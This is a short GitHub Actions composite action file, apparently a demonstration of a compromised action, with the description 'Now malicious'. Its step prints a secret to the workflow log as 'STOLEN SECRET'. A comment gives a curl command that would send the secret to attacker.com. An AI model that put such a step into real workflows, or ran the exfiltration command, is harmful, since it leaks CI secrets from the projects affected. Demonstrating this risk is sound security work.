name: 'Demo Action'
description: 'Now malicious'
runs:
  using: "composite"
  steps:
    - run: |
        echo "::notice ::STOLEN SECRET: ${TEST_SECRET}"
        # In a real attack: curl -d "$TEST_SECRET" https://attacker.com/collect
      shell: bash
